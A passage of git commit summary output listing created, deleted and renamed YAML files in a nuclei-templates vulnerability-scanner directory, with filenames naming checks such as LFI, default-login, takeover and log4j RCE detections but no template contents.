mode 100644 nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml delete mode 100644 nuclei-templates/Other/Nsfocus_sas_Exec.yaml create mode 100644 nuclei-templates/Other/Panabit-sy_addmount-rce.yaml rename nuclei-templates/Other/{0xlfi.yaml => Path-Traversal.yaml} (100%) rename nuclei-templates/Other/{Redmine-Default-Login.yaml => RedMine-Detect.yaml} (100%) rename nuclei-templates/Other/{Ruijie_EXCU_SHELL.yaml => Ruijie_NBR_Router_fileupload.yaml} (100%) delete mode 100644 nuclei-templates/Other/SQLInjection_ERROR.yaml rename nuclei-templates/Other/{sitecore.yaml => SiteCore.yaml} (100%) create mode 100755 nuclei-templates/Other/Springboot-Loggers.yaml create mode 100644 nuclei-templates/Other/Symantec-Messaging-Gateway.yaml create mode 100755 nuclei-templates/Other/WP-Vault-LFI.yaml create mode 100644 nuclei-templates/Other/WooYun-2015-148227.yaml rename nuclei-templates/Other/{X-Host .yaml => X-Host.yaml} (100%) rename nuclei-templates/Other/{X-Remote-IP.yaml => X-Remote-IP .yaml} (100%) rename nuclei-templates/Other/{abyss-web-server-12.yaml => abyss-web-server.yaml} (100%) rename nuclei-templates/Other/{accent-microcomputers-lfi-17.yaml => accent-microcomputers-lfi-14.yaml} (100%) delete mode 100644 nuclei-templates/Other/acemanager-login-25.yaml create mode 100644 nuclei-templates/Other/acemanager-login.yaml rename nuclei-templates/Other/{acme-xss.yaml => acme-xss-28.yaml} (100%) delete mode 100644 nuclei-templates/Other/acontent-detect-32.yaml create mode 100644 nuclei-templates/Other/acontent-detect-33.yaml rename nuclei-templates/Other/{acquia-takeover-35.yaml => acquia-takeover.yaml} (100%) rename nuclei-templates/Other/{acrolinx-dashboard-38.yaml => acrolinx-dashboard-37.yaml} (100%) rename nuclei-templates/Other/{active-admin-exposure-43.yaml => active-admin-exposure.yaml} (100%) rename nuclei-templates/Other/{activemq-default-login-46.yaml => activemq-default-login-48.yaml} (100%) create mode 100644 nuclei-templates/Other/activemq-panel-53.yaml 
delete mode 100644 nuclei-templates/Other/activemq-panel.yaml create mode 100644 nuclei-templates/Other/acunetix-panel-54.yaml delete mode 100644 nuclei-templates/Other/acunetix-panel-59.yaml delete mode 100644 nuclei-templates/Other/adb-backup-enabled-60.yaml create mode 100644 nuclei-templates/Other/adb-backup-enabled-61.yaml rename nuclei-templates/Other/{addeventlistener-detect-64.yaml => addeventlistener-detect-65.yaml} (100%) create mode 100644 nuclei-templates/Other/adiscon-loganalyzer-67.yaml delete mode 100644 nuclei-templates/Other/adiscon-loganalyzer-70.yaml delete mode 100644 nuclei-templates/Other/adminer-panel-74.yaml create mode 100644 nuclei-templates/Other/adminer-panel-75.yaml rename nuclei-templates/Other/{adminset-panel-80.yaml => adminset-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-component-login-89.yaml delete mode 100644 nuclei-templates/Other/adobe-component-login-91.yaml create mode 100644 nuclei-templates/Other/adobe-component-login-92.yaml delete mode 100644 nuclei-templates/Other/adobe-component-login.yaml create mode 100644 nuclei-templates/Other/adobe-connect-central-login-96.yaml delete mode 100644 nuclei-templates/Other/adobe-connect-central-login-97.yaml rename nuclei-templates/Other/{adobe-connect-version.yaml => adobe-connect-version-104.yaml} (100%) delete mode 100644 nuclei-templates/Other/adobe-experience-manager-login-109.yaml create mode 100644 nuclei-templates/Other/adobe-experience-manager-login.yaml rename nuclei-templates/Other/{adobe-media-server-112.yaml => adobe-media-server-110.yaml} (100%) delete mode 100644 nuclei-templates/Other/advanced-access-manager-lfi-116.yaml create mode 100644 nuclei-templates/Other/advanced-access-manager-lfi-118.yaml delete mode 100644 nuclei-templates/Other/aem-cached-pages-130.yaml create mode 100644 nuclei-templates/Other/aem-cached-pages.yaml rename nuclei-templates/Other/{aem-crx-bypass.yaml => aem-crx-bypass-133.yaml} (100%) create mode 100644 
nuclei-templates/Other/aem-default-login-140.yaml delete mode 100644 nuclei-templates/Other/aem-default-login-142.yaml rename nuclei-templates/Other/{aem-detection-146.yaml => aem-detection-145.yaml} (100%) rename nuclei-templates/Other/{aem-gql-servlet-150.yaml => aem-gql-servlet-149.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-groovyconsole.yaml create mode 100644 nuclei-templates/Other/aem-hash-querybuilder-159.yaml delete mode 100644 nuclei-templates/Other/aem-hash-querybuilder-161.yaml delete mode 100644 nuclei-templates/Other/aem-login-status-170.yaml create mode 100644 nuclei-templates/Other/aem-login-status-171.yaml rename nuclei-templates/Other/{aem-merge-metadata-servlet-172.yaml => aem-merge-metadata-servlet-174.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-misconfig.yaml rename nuclei-templates/Other/{aem-querybuilder-feed-servlet-177.yaml => aem-querybuilder-feed-servlet-175.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read-180.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet-182.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml rename nuclei-templates/Other/{aem-setpreferences-xss-188.yaml => aem-setpreferences-xss.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-userinfo-servlet-190.yaml delete mode 100644 nuclei-templates/Other/aem-userinfo-servlet.yaml create mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet-194.yaml delete mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet-196.yaml delete mode 100644 nuclei-templates/Other/aem_misconfig.yaml rename nuclei-templates/Other/{aerohive-netconfig-ui-201.yaml => aerohive-netconfig-ui-199.yaml} (100%) delete mode 100644 nuclei-templates/Other/aftership-takeover-204.yaml create mode 100644 nuclei-templates/Other/aftership-takeover-205.yaml create mode 
100644 nuclei-templates/Other/aha-takeover-217.yaml delete mode 100644 nuclei-templates/Other/aha-takeover.yaml rename nuclei-templates/Other/{aims-password-mgmt-client-219.yaml => aims-password-mgmt-client-221.yaml} (100%) delete mode 100644 nuclei-templates/Other/aims-password-portal-222.yaml create mode 100644 nuclei-templates/Other/aims-password-portal.yaml delete mode 100644 nuclei-templates/Other/airee-takeover-226.yaml create mode 100644 nuclei-templates/Other/airee-takeover-228.yaml create mode 100644 nuclei-templates/Other/airflow-configuration-exposure-230.yaml delete mode 100644 nuclei-templates/Other/airflow-configuration-exposure.yaml rename nuclei-templates/Other/{airflow-debug-231.yaml => airflow-debug.yaml} (100%) delete mode 100644 nuclei-templates/Other/airflow-detect-239.yaml create mode 100644 nuclei-templates/Other/airflow-detect.yaml rename nuclei-templates/Other/{Airflow-unauthorized.yaml => airflow-unauthorized.yaml} (100%) delete mode 100644 nuclei-templates/Other/akamai-cloudtest-252.yaml create mode 100644 nuclei-templates/Other/akamai-cloudtest-253.yaml create mode 100644 nuclei-templates/Other/alibaba-anyproxy-fileread.yaml delete mode 100644 nuclei-templates/Other/alibaba-canal-info-leak-266.yaml create mode 100644 nuclei-templates/Other/alibaba-canal-info-leak.yaml rename nuclei-templates/Other/{alibaba-mongoshake-unauth-268.yaml => alibaba-mongoshake-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/alphaweb-default-login-277.yaml delete mode 100644 nuclei-templates/Other/alphaweb-default-login.yaml create mode 100644 nuclei-templates/Other/amazon-docker-config-280.yaml delete mode 100644 nuclei-templates/Other/amazon-docker-config.yaml create mode 100755 nuclei-templates/Other/amazon-mws-auth-token-11845.yaml delete mode 100644 nuclei-templates/Other/amazon-mws-auth-token-value.yaml delete mode 100644 nuclei-templates/Other/ambari-default-credentials-285.yaml create mode 100644 
nuclei-templates/Other/ambari-default-credentials.yaml create mode 100644 nuclei-templates/Other/ambari-exposure-293.yaml delete mode 100644 nuclei-templates/Other/ambari-exposure-294.yaml rename nuclei-templates/Other/{ametys-admin-login-301.yaml => ametys-admin-login-300.yaml} (100%) create mode 100644 nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml delete mode 100644 nuclei-templates/Other/amministrazione-aperta-lfi.yaml delete mode 100644 nuclei-templates/Other/ampps-admin-panel-304.yaml create mode 100644 nuclei-templates/Other/ampps-admin-panel-305.yaml rename nuclei-templates/Other/{AMSS-sqli.yaml => amss-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/android-debug-database-exposed-315.yaml create mode 100644 nuclei-templates/Other/android-debug-database-exposed.yaml delete mode 100644 nuclei-templates/Other/anima-takeover-318.yaml create mode 100644 nuclei-templates/Other/anima-takeover-319.yaml rename nuclei-templates/Other/{Anni-fileDownload.yaml => anni-filedownload.yaml} (100%) create mode 100644 nuclei-templates/Other/announcekit-takeover-322.yaml delete mode 100644 nuclei-templates/Other/announcekit-takeover-324.yaml delete mode 100644 nuclei-templates/Other/ansible-config-disclosure-326.yaml create mode 100644 nuclei-templates/Other/ansible-config-disclosure.yaml rename nuclei-templates/Other/{ansible-semaphore-panel-327.yaml => ansible-semaphore-panel.yaml} (100%) rename nuclei-templates/Other/{ansible-tower-exposure-329.yaml => ansible-tower-exposure.yaml} (100%) delete mode 100644 nuclei-templates/Other/antsword-backdoor-334.yaml create mode 100644 nuclei-templates/Other/antsword-backdoor-335.yaml rename nuclei-templates/Other/{AolynkBR304-weakPass.yaml => aolynkbr304-weakpass.yaml} (100%) delete mode 100644 nuclei-templates/Other/apache-axis-detect-339.yaml create mode 100644 nuclei-templates/Other/apache-axis-detect.yaml create mode 100644 nuclei-templates/Other/apache-cocoon-detect-342.yaml delete mode 100644 
nuclei-templates/Other/apache-cocoon-detect.yaml delete mode 100644 nuclei-templates/Other/apache-detect-346.yaml create mode 100644 nuclei-templates/Other/apache-detect-347.yaml delete mode 100644 nuclei-templates/Other/apache-filename-enum-354.yaml create mode 100644 nuclei-templates/Other/apache-filename-enum.yaml create mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-356.yaml delete mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-359.yaml create mode 100644 nuclei-templates/Other/apache-ofbiz-log4j-rce-366.yaml delete mode 100644 nuclei-templates/Other/apache-ofbiz-log4j-rce.yaml create mode 100644 nuclei-templates/Other/apache-solr-file-read.yaml delete mode 100644 nuclei-templates/Other/apache-solr-log4j-rce-372.yaml create mode 100644 nuclei-templates/Other/apache-solr-log4j-rce.yaml delete mode 100644 nuclei-templates/Other/apache-tomcat-CVE-2022-34305.yaml create mode 100644 nuclei-templates/Other/apache-tomcat-cve-2022-34305.yaml create mode 100644 nuclei-templates/Other/apc-ups-login-382.yaml delete mode 100644 nuclei-templates/Other/apc-ups-login.yaml rename nuclei-templates/Other/{apc-info-378.yaml => apc_info.yaml} (100%) create mode 100644 nuclei-templates/Other/api-adafruit-io-387.yaml delete mode 100644 nuclei-templates/Other/api-adafruit-io.yaml create mode 100644 nuclei-templates/Other/api-apigee-edge-391.yaml delete mode 100644 nuclei-templates/Other/api-apigee-edge.yaml delete mode 100644 nuclei-templates/Other/api-appveyor-392.yaml create mode 100644 nuclei-templates/Other/api-appveyor.yaml delete mode 100644 nuclei-templates/Other/api-bible-394.yaml create mode 100644 nuclei-templates/Other/api-bible.yaml delete mode 100644 nuclei-templates/Other/api-bitrise-397.yaml create mode 100644 nuclei-templates/Other/api-bitrise.yaml create mode 100644 nuclei-templates/Other/api-blockchain-398.yaml delete mode 100644 nuclei-templates/Other/api-blockchain.yaml delete mode 100644 nuclei-templates/Other/api-buildkite.yaml delete 
mode 100644 nuclei-templates/Other/api-buttercms-403.yaml delete mode 100644 nuclei-templates/Other/api-calendly.yaml create mode 100644 nuclei-templates/Other/api-clearbit-407.yaml delete mode 100644 nuclei-templates/Other/api-clearbit.yaml create mode 100644 nuclei-templates/Other/api-coinapi-408.yaml delete mode 100644 nuclei-templates/Other/api-coinapi.yaml create mode 100644 nuclei-templates/Other/api-dbt-413.yaml delete mode 100644 nuclei-templates/Other/api-dbt.yaml create mode 100644 nuclei-templates/Other/api-debounce-414.yaml delete mode 100644 nuclei-templates/Other/api-debounce.yaml create mode 100644 nuclei-templates/Other/api-deviantart-415.yaml delete mode 100644 nuclei-templates/Other/api-deviantart.yaml delete mode 100644 nuclei-templates/Other/api-dribbble-416.yaml create mode 100644 nuclei-templates/Other/api-dribbble-417.yaml delete mode 100644 nuclei-templates/Other/api-dropbox-418.yaml create mode 100644 nuclei-templates/Other/api-dropbox.yaml create mode 100644 nuclei-templates/Other/api-facebook-422.yaml delete mode 100644 nuclei-templates/Other/api-facebook.yaml create mode 100644 nuclei-templates/Other/api-fastly-423.yaml delete mode 100644 nuclei-templates/Other/api-fastly-424.yaml create mode 100644 nuclei-templates/Other/api-fontawesome-426.yaml delete mode 100644 nuclei-templates/Other/api-fontawesome.yaml create mode 100644 nuclei-templates/Other/api-github-429.yaml delete mode 100644 nuclei-templates/Other/api-github.yaml create mode 100644 nuclei-templates/Other/api-google-drive-432.yaml delete mode 100644 nuclei-templates/Other/api-google-drive.yaml create mode 100644 nuclei-templates/Other/api-heroku-435.yaml delete mode 100644 nuclei-templates/Other/api-heroku.yaml create mode 100644 nuclei-templates/Other/api-hubspot-437.yaml delete mode 100644 nuclei-templates/Other/api-iconfinder-438.yaml create mode 100644 nuclei-templates/Other/api-iconfinder-439.yaml delete mode 100644 nuclei-templates/Other/api-instatus-442.yaml create 
mode 100644 nuclei-templates/Other/api-instatus.yaml create mode 100644 nuclei-templates/Other/api-iterable-445.yaml rename nuclei-templates/Other/{api-leanix-450.yaml => api-leanix.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-linkedin-451.yaml create mode 100644 nuclei-templates/Other/api-linkedin.yaml delete mode 100644 nuclei-templates/Other/api-linkfinder.yaml rename nuclei-templates/Other/{api-malshare-456.yaml => api-malshare.yaml} (100%) create mode 100644 nuclei-templates/Other/api-mapbox-465.yaml delete mode 100644 nuclei-templates/Other/api-mojoauth-466.yaml create mode 100644 nuclei-templates/Other/api-mojoauth.yaml create mode 100644 nuclei-templates/Other/api-npm-471.yaml create mode 100644 nuclei-templates/Other/api-onelogin-472.yaml delete mode 100644 nuclei-templates/Other/api-onelogin.yaml delete mode 100644 nuclei-templates/Other/api-openweather-473.yaml delete mode 100644 nuclei-templates/Other/api-pagerduty-475.yaml create mode 100644 nuclei-templates/Other/api-pastebin-477.yaml delete mode 100644 nuclei-templates/Other/api-pastebin.yaml delete mode 100644 nuclei-templates/Other/api-paypal-478.yaml create mode 100644 nuclei-templates/Other/api-paypal.yaml delete mode 100644 nuclei-templates/Other/api-petfinder-480.yaml create mode 100644 nuclei-templates/Other/api-petfinder.yaml delete mode 100644 nuclei-templates/Other/api-postmark.yaml create mode 100644 nuclei-templates/Other/api-quip-484.yaml delete mode 100644 nuclei-templates/Other/api-quip.yaml rename nuclei-templates/Other/{api-rijksmuseum.yaml => api-rijksmuseum-485.yaml} (100%) create mode 100644 nuclei-templates/Other/api-slack.yaml delete mode 100644 nuclei-templates/Other/api-square-496.yaml delete mode 100644 nuclei-templates/Other/api-sslmate-497.yaml create mode 100644 nuclei-templates/Other/api-sslmate.yaml create mode 100644 nuclei-templates/Other/api-stytch-500.yaml delete mode 100644 nuclei-templates/Other/api-stytch.yaml rename 
nuclei-templates/Other/{api-thecatapi-503.yaml => api-thecatapi.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-twitter.yaml rename nuclei-templates/Other/{api-urlscan-508.yaml => api-urlscan-509.yaml} (100%) rename nuclei-templates/Other/{api-virustotal.yaml => api-virustotal-512.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-visualstudio-513.yaml delete mode 100644 nuclei-templates/Other/api-weglot-516.yaml create mode 100644 nuclei-templates/Other/api-weglot.yaml create mode 100644 nuclei-templates/Other/apollo-adminservice.yaml delete mode 100644 nuclei-templates/Other/apollo-default-login-520.yaml create mode 100644 nuclei-templates/Other/apollo-default-login-521.yaml delete mode 100644 nuclei-templates/Other/appspec-yml-disclosure-527.yaml create mode 100644 nuclei-templates/Other/appspec-yml-disclosure.yaml rename nuclei-templates/Other/{arcgis-panel-530.yaml => arcgis-panel-531.yaml} (100%) rename nuclei-templates/Other/{arcgis-rest-api.yaml => arcgis-rest-api-533.yaml} (100%) rename nuclei-templates/Other/{argocd-login-536.yaml => argocd-login-534.yaml} (100%) delete mode 100644 nuclei-templates/Other/arl-default-login-539.yaml create mode 100644 nuclei-templates/Other/arl-default-login.yaml create mode 100644 nuclei-templates/Other/artica-web-proxy-detect-543.yaml delete mode 100644 nuclei-templates/Other/artica-web-proxy-detect.yaml rename nuclei-templates/Other/{artifactory_deploy.yaml => artifactory-anonymous-deploy.yaml} (100%) create mode 100644 nuclei-templates/Other/asanhamayesh-lfi-552.yaml delete mode 100644 nuclei-templates/Other/asanhamayesh-lfi-553.yaml create mode 100644 nuclei-templates/Other/aspose-file-download-561.yaml delete mode 100644 nuclei-templates/Other/aspose-file-download.yaml rename nuclei-templates/Other/{aspose-pdf-file-download.yaml => aspose-pdf-file-download-566.yaml} (100%) create mode 100644 nuclei-templates/Other/aspose-words-file-download-571.yaml delete mode 100644 
nuclei-templates/Other/aspose-words-file-download.yaml create mode 100644 nuclei-templates/Other/asustor-adm-sqli.yaml delete mode 100644 nuclei-templates/Other/athd-dvr-fileread.yaml create mode 100644 nuclei-templates/Other/atlassian-crowd-panel-581.yaml delete mode 100644 nuclei-templates/Other/atlassian-crowd-panel-585.yaml rename nuclei-templates/Other/{atvise-login-591.yaml => atvise-login-590.yaml} (100%) delete mode 100644 nuclei-templates/Other/autobahn-python-detect-595.yaml create mode 100644 nuclei-templates/Other/autobahn-python-detect.yaml rename nuclei-templates/Other/{automation-direct-596.yaml => automation-direct-597.yaml} (100%) create mode 100644 nuclei-templates/Other/avantfax-detect-598.yaml delete mode 100644 nuclei-templates/Other/avantfax-detect-600.yaml delete mode 100644 nuclei-templates/Other/avantfax-panel-601.yaml create mode 100644 nuclei-templates/Other/avantfax-panel-603.yaml rename nuclei-templates/Other/{avatier-password-management.yaml => avatier-password-management-605.yaml} (100%) rename nuclei-templates/Other/{avtech-avn801-camera-panel.yaml => avtech-avn801-camera-panel-612.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-access-key-value-621.yaml delete mode 100644 nuclei-templates/Other/aws-access-key-value-622.yaml delete mode 100644 nuclei-templates/Other/aws-bucket-takeover-630.yaml create mode 100644 nuclei-templates/Other/aws-bucket-takeover-631.yaml rename nuclei-templates/Other/{aws-ecs-container-agent-tasks.yaml => aws-ecs-container-agent-tasks-640.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml delete mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml rename nuclei-templates/Other/{aws-object-listing-648.yaml => aws-object-listing-645.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-redirect-651.yaml delete mode 100644 nuclei-templates/Other/aws-redirect-654.yaml rename nuclei-templates/Other/{awstats-config-656.yaml => 
awstats-config-655.yaml} (100%) rename nuclei-templates/Other/{awstats-script.yaml => awstats-script-658.yaml} (100%) delete mode 100644 nuclei-templates/Other/axigen-webmail-662.yaml create mode 100644 nuclei-templates/Other/axigen-webmail-664.yaml create mode 100644 nuclei-templates/Other/axiom-digitalocean-key-exposure-666.yaml delete mode 100644 nuclei-templates/Other/axiom-digitalocean-key-exposure.yaml rename nuclei-templates/Other/{azkaban-web-client-679.yaml => azkaban-web-client.yaml} (100%) delete mode 100644 nuclei-templates/Other/bak.yaml rename nuclei-templates/Other/{bash.yaml => bash-scanner.yaml} (100%) rename nuclei-templates/Other/{basic-auth-detection.yaml => basic-auth-detection-687.yaml} (100%) create mode 100644 nuclei-templates/Other/basic-xss-prober-696.yaml delete mode 100644 nuclei-templates/Other/basic-xss-prober.yaml create mode 100644 nuclei-templates/Other/basic_sqli.yaml delete mode 100644 nuclei-templates/Other/bems-api-lfi-711.yaml create mode 100644 nuclei-templates/Other/bems-api-lfi.yaml delete mode 100644 nuclei-templates/Other/beyondtrust-login-server-719.yaml create mode 100644 nuclei-templates/Other/beyondtrust-login-server.yaml delete mode 100644 nuclei-templates/Other/bigbluebutton-login-725.yaml create mode 100644 nuclei-templates/Other/bigbluebutton-login-726.yaml rename nuclei-templates/Other/{bigcartel-takeover.yaml => bigcartel-takeover-728.yaml} (100%) delete mode 100644 nuclei-templates/Other/bigip-config-utility-detect-733.yaml create mode 100644 nuclei-templates/Other/bigip-config-utility-detect.yaml rename nuclei-templates/Other/{bigip-detection-735.yaml => bigip-detection.yaml} (100%) rename nuclei-templates/Other/{api-bitly-396.yaml => bitly.yaml} (100%) create mode 100644 nuclei-templates/Other/bitrix-open-redirect-743.yaml delete mode 100644 nuclei-templates/Other/bitrix-open-redirect-744.yaml delete mode 100644 nuclei-templates/Other/bitrix-panel-748.yaml create mode 100644 
nuclei-templates/Other/bitrix-panel-750.yaml create mode 100644 nuclei-templates/Other/bitrix_bak_check.yaml create mode 100644 nuclei-templates/Other/blind-xss.yaml rename nuclei-templates/Other/{blue-iris-login-751.yaml => blue-iris-login-754.yaml} (100%) delete mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml create mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi-758.yaml delete mode 100644 nuclei-templates/Other/boa-web-fileread.yaml create mode 100644 nuclei-templates/Other/bolt-cms-panel-763.yaml delete mode 100644 nuclei-templates/Other/bolt-cms-panel.yaml delete mode 100644 nuclei-templates/Other/bower-json-769.yaml create mode 100644 nuclei-templates/Other/bower-json-770.yaml rename nuclei-templates/Other/{braintree-access-token.yaml => braintree-access-token-773.yaml} (100%) delete mode 100644 nuclei-templates/Other/brandfolder-lfi-776.yaml create mode 100644 nuclei-templates/Other/brandfolder-lfi.yaml create mode 100644 nuclei-templates/Other/brandfolder-open-redirect-780.yaml delete mode 100644 nuclei-templates/Other/brandfolder-open-redirect.yaml rename nuclei-templates/Other/{brother-printer-detect-790.yaml => brother-printer-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/browserless-debugger-794.yaml create mode 100644 nuclei-templates/Other/browserless-debugger-795.yaml create mode 100644 nuclei-templates/Other/buddy-panel-797.yaml delete mode 100644 nuclei-templates/Other/buddy-panel.yaml rename nuclei-templates/Other/{buffalo-config-injection-800.yaml => buffalo-config-injection-801.yaml} (100%) create mode 100644 nuclei-templates/Other/buildkite.yaml delete mode 100644 nuclei-templates/Other/bullwark-momentum-lfi-808.yaml create mode 100644 nuclei-templates/Other/bullwark-momentum-lfi.yaml delete mode 100644 nuclei-templates/Other/burp-api-detect-812.yaml create mode 100644 nuclei-templates/Other/burp-api-detect.yaml rename nuclei-templates/Other/{businessintelligence-default-login-816.yaml => 
businessintelligence-default-login-817.yaml} (100%) create mode 100644 nuclei-templates/Other/buttercms.yaml create mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml delete mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi.yaml rename nuclei-templates/Other/{cache-poisoning-821.yaml => cache_piossing.yaml} (100%) rename nuclei-templates/Other/{cacti-detect.yaml => cacti-detect-826.yaml} (100%) rename nuclei-templates/Other/{cacti-panel.yaml => cacti-panel-828.yaml} (100%) delete mode 100644 nuclei-templates/Other/caddy-open-redirect-837.yaml create mode 100644 nuclei-templates/Other/caddy-open-redirect.yaml create mode 100644 nuclei-templates/Other/calendly.yaml rename nuclei-templates/Other/{call-break-cms.yaml => call-break-cms-840.yaml} (100%) delete mode 100644 nuclei-templates/Other/campaignmonitor-843.yaml create mode 100644 nuclei-templates/Other/campaignmonitor-844.yaml create mode 100644 nuclei-templates/Other/can-i-take-over-dns-852.yaml delete mode 100644 nuclei-templates/Other/can-i-take-over-dns-853.yaml delete mode 100644 nuclei-templates/Other/candidate-application-lfi-850.yaml create mode 100644 nuclei-templates/Other/candidate-application-lfi-851.yaml delete mode 100644 nuclei-templates/Other/canny-takeover-854.yaml create mode 100644 nuclei-templates/Other/canny-takeover-856.yaml create mode 100644 nuclei-templates/Other/carestream-vue-detect-860.yaml delete mode 100644 nuclei-templates/Other/carestream-vue-detect-861.yaml delete mode 100644 nuclei-templates/Other/cargo-takeover-868.yaml create mode 100644 nuclei-templates/Other/cargo-takeover.yaml create mode 100644 nuclei-templates/Other/cargocollective-takeover-862.yaml delete mode 100644 nuclei-templates/Other/cargocollective-takeover-864.yaml delete mode 100644 nuclei-templates/Other/cas-login-870.yaml create mode 100644 nuclei-templates/Other/cas-login.yaml create mode 100644 nuclei-templates/Other/casbin.yaml delete mode 100644 
nuclei-templates/Other/cerebro-panel-881.yaml create mode 100644 nuclei-templates/Other/cerebro-panel.yaml rename nuclei-templates/Other/{certificate-validation-882.yaml => certificate-validation-884.yaml} (100%) create mode 100644 nuclei-templates/Other/cf7-message-filter.yaml create mode 100644 nuclei-templates/Other/cgi-printenv-885.yaml delete mode 100644 nuclei-templates/Other/cgi-printenv-886.yaml create mode 100644 nuclei-templates/Other/cgi-test-page-887.yaml delete mode 100644 nuclei-templates/Other/cgi-test-page.yaml delete mode 100644 nuclei-templates/Other/chamilo-lms-sqli-892.yaml create mode 100644 nuclei-templates/Other/chamilo-lms-sqli.yaml delete mode 100644 nuclei-templates/Other/chamilo-lms-xss-893.yaml create mode 100644 nuclei-templates/Other/chamilo-lms-xss.yaml rename nuclei-templates/Other/{chanjet-crm-sqli.yaml => chanjet-CRM-sqli.yaml} (100%) rename nuclei-templates/Other/{checkmarx-panel-895.yaml => checkmarx-panel-897.yaml} (100%) rename nuclei-templates/Other/{checkpoint-panel-899.yaml => checkpoint-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/cherry-file-download-900.yaml delete mode 100644 nuclei-templates/Other/cherry-file-download.yaml delete mode 100644 nuclei-templates/Other/cherry-lfi-902.yaml create mode 100644 nuclei-templates/Other/cherry-lfi-903.yaml rename nuclei-templates/Other/{chevereto-detect.yaml => chevereto-detect-905.yaml} (100%) delete mode 100644 nuclei-templates/Other/chinaunicom-default-login-906.yaml create mode 100644 nuclei-templates/Other/chinaunicom-default-login-908.yaml delete mode 100644 nuclei-templates/Other/churchope-lfi-915.yaml create mode 100644 nuclei-templates/Other/churchope-lfi.yaml create mode 100644 nuclei-templates/Other/circarlife-setup-917.yaml delete mode 100644 nuclei-templates/Other/circarlife-setup.yaml delete mode 100644 nuclei-templates/Other/circleci-config-924.yaml create mode 100644 nuclei-templates/Other/circleci-config-925.yaml create mode 100644 
nuclei-templates/Other/circleci-ssh-config-928.yaml delete mode 100644 nuclei-templates/Other/circleci-ssh-config.yaml rename nuclei-templates/Other/{cisco-ace-device-manager-929.yaml => cisco-ace-device-manager-931.yaml} (100%) delete mode 100644 nuclei-templates/Other/cisco-asa-panel-932.yaml create mode 100644 nuclei-templates/Other/cisco-asa-panel-934.yaml delete mode 100644 nuclei-templates/Other/cisco-edge-340-936.yaml create mode 100644 nuclei-templates/Other/cisco-edge-340.yaml delete mode 100644 nuclei-templates/Other/cisco-finesse-login-940.yaml create mode 100644 nuclei-templates/Other/cisco-finesse-login.yaml delete mode 100644 nuclei-templates/Other/cisco-integrated-login-943.yaml create mode 100644 nuclei-templates/Other/cisco-integrated-login.yaml rename nuclei-templates/Other/{cisco-meraki-exposure-944.yaml => cisco-meraki-exposure.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-network-config-950.yaml delete mode 100644 nuclei-templates/Other/cisco-network-config.yaml rename nuclei-templates/Other/{cisco-prime-infrastructure-954.yaml => cisco-prime-infrastructure-952.yaml} (100%) delete mode 100644 nuclei-templates/Other/cisco-sd-wan-957.yaml create mode 100644 nuclei-templates/Other/cisco-sd-wan.yaml rename nuclei-templates/Other/{cisco-secure-desktop-960.yaml => cisco-secure-desktop-962.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-sendgrid-965.yaml delete mode 100644 nuclei-templates/Other/cisco-sendgrid-967.yaml delete mode 100644 nuclei-templates/Other/cisco-smi-exposure-970.yaml create mode 100644 nuclei-templates/Other/cisco-smi-exposure.yaml rename nuclei-templates/Other/{cisco-systems-login.yaml => cisco-systems-login-975.yaml} (100%) delete mode 100644 nuclei-templates/Other/cisco-telepresence-976.yaml create mode 100644 nuclei-templates/Other/cisco-telepresence.yaml rename nuclei-templates/Other/{cisco-ucs-kvm-login.yaml => cisco-ucs-kvm-login-980.yaml} (100%) delete mode 100644 
nuclei-templates/Other/citrix-adc-gateway-detect-981.yaml create mode 100644 nuclei-templates/Other/citrix-adc-gateway-detect.yaml create mode 100644 nuclei-templates/Other/citrix-vpn-detect-987.yaml delete mode 100644 nuclei-templates/Other/citrix-vpn-detect.yaml delete mode 100644 nuclei-templates/Other/cl-te-http-smuggling.yaml rename nuclei-templates/Other/{clave-login-panel-996.yaml => clave-login-panel-994.yaml} (100%) rename nuclei-templates/Other/{clearpass-policy-manager-1000.yaml => clearpass-policy-manager-997.yaml} (100%) delete mode 100644 nuclei-templates/Other/clickhouse-unauth-1002.yaml create mode 100644 nuclei-templates/Other/clickhouse-unauth.yaml create mode 100644 nuclei-templates/Other/clientaccesspolicy-1005.yaml delete mode 100644 nuclei-templates/Other/clientaccesspolicy-1007.yaml create mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1015.yaml delete mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure.yaml create mode 100644 nuclei-templates/Other/clockwork-php-page-1019.yaml delete mode 100644 nuclei-templates/Other/clockwork-php-page.yaml rename nuclei-templates/Other/{cloudflare-image-ssrf.yaml => cloudflare-image-ssrf-1021.yaml} (100%) rename nuclei-templates/Other/{cloudinary-1026.yaml => cloudinary-1025.yaml} (100%) create mode 100644 nuclei-templates/Other/cname-service-detection-1031.yaml delete mode 100644 nuclei-templates/Other/cname-service-detection-1032.yaml rename nuclei-templates/Other/{cname-service-detector.yaml => 